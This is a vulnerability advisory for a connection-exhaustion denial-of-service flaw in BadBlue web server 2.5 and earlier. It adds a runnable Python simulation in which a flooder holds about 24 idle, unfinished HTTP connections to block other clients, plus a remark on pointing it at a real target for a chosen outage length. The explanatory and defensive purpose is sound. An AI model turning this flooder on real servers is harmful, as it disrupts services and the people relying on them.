BadBlue Denial Of Service
Vendor: BadBlue
Product: BadBlue
Version: <= 2.5
Website: http://www.badblue.com
BID: 10983
CVE: CVE-2004-1727
OSVDB: 9107
SECUNIA: 12346
PACKETSTORM: 34103
Description:
Share photos, videos, music, and business files with friends and colleagues instantly. Tired of paying a service to share your files (and the hassle of sending your files to their site)? BadBlue shares files directly from your own PC, using the cable/DSL/broadband/dialup connection you already paid for! BadBlue lets you run a no-hassle Web site on your own PC for free, including a domain name you can choose. Within seconds, you can transform your PC into a friendly, file-sharing Web server with all the power of a real server on the Internet. Remote users can search for files, explore your shared folders, and run full-blown applications created in HTML, PHP, Perl, and so on.

Denial Of Service Vulnerability:
BadBlue Webserver cannot cope with a large number of simultaneous connections, even when they all originate from a single host: at roughly twenty-four concurrent connections it stops serving any client at all, and every further connection attempt is refused. The proof of concept below opens that many connections to the target and keeps them open for as long as you specify, so all other traffic to the affected server is blocked for that period. Because a single unprivileged remote host can reach the ceiling on its own, no special access or authentication is required.
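The following is an added example written for this page; it is not GulfTech's proof of concept and not BadBlue code. It reproduces the connection-exhaustion technique described above against a small simulated server so it can be run offline: CappedServer is an assumed stand-in that refuses all new connections once CONNECTION_CAP (set to the roughly twenty-four the advisory reports) are held open, open_idle_connections() is the flooder, which opens that many sockets and leaves each with an unfinished request so the slots stay pinned, and probe() checks whether an ordinary client still gets a response. All names, the cap value and the server behaviour are assumptions made for the demonstration.

```python
import socket
import threading
import time

# Assumed ceiling for the simulation, modelled on the roughly twenty-four
# simultaneous connections the advisory reports for BadBlue <= 2.5.
CONNECTION_CAP = 24


class CappedServer:
    """Toy HTTP listener that drops every new connection once `cap` are held.

    Stand-in for the reported BadBlue behaviour so the demo runs offline;
    it is not BadBlue and not the original proof of concept.
    """

    def __init__(self, cap=CONNECTION_CAP):
        self.cap, self.active, self.lock = cap, 0, threading.Lock()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(128)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                conn, _ = self.sock.accept()
            except OSError:          # listener closed
                return
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        with self.lock:
            if self.active >= self.cap:
                conn.close()         # over the ceiling: no reply at all
                return
            self.active += 1
        try:
            conn.settimeout(30)
            buf = b""
            # Wait for a complete request; a client that never sends the
            # terminating blank line pins this slot until it hangs up.
            while b"\r\n\r\n" not in buf:
                chunk = conn.recv(1024)
                if not chunk:
                    return
                buf += chunk
            conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nok")
        except OSError:
            pass
        finally:
            with self.lock:
                self.active -= 1
            conn.close()

    def close(self):
        self.sock.close()


def open_idle_connections(host, port, count):
    """Open `count` sockets and leave each with an unfinished request."""
    socks = []
    for _ in range(count):
        s = socket.create_connection((host, port), timeout=5)
        s.sendall(b"GET / HTTP/1.0\r\n")   # no blank line, so never complete
        socks.append(s)
    return socks


def probe(host, port, timeout=2):
    """True if the server still answers an ordinary request."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.0\r\nHost: localhost\r\n\r\n")
            return s.recv(64).startswith(b"HTTP/1.0 200")
    except OSError:
        return False


def _wait(cond, seconds=5):
    deadline = time.monotonic() + seconds
    while not cond() and time.monotonic() < deadline:
        time.sleep(0.01)
    return cond()


def demonstrate(cap=CONNECTION_CAP, hold_seconds=0.5):
    """Return (answers_before, answers_while_flooded, answers_after)."""
    server = CappedServer(cap)
    try:
        before = probe("127.0.0.1", server.port)
        held = open_idle_connections("127.0.0.1", server.port, cap)
        _wait(lambda: server.active >= cap)        # every slot now pinned
        during = probe("127.0.0.1", server.port)
        time.sleep(hold_seconds)                   # hold for as long as wanted
        for s in held:
            s.close()
        _wait(lambda: server.active == 0)          # slots released again
        after = probe("127.0.0.1", server.port)
        return before, during, after
    finally:
        server.close()


if __name__ == "__main__":
    print(demonstrate())
```

Running the script prints (True, False, True): the server answers before the flood, refuses the probe while the connections are held, and recovers once they are closed. Against a real target the flooder would be pointed at the listener's address with the hold time raised to the desired outage length; the point of the simulation is that nothing beyond idle TCP connections from one host is needed.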

Proof of Concept:
BadBlue Webserver Denial of Service POC Code

Solution:
The development team has been contacted and said they will be looking into this issue shortly. Users are advised to upgrade as soon as a fixed version is available. Until then, restricting which hosts can reach the BadBlue listener reduces exposure, since any single remote host that can connect is able to exhaust the connection limit.

Credits:
James Bercegay of the GulfTech Security Research Team.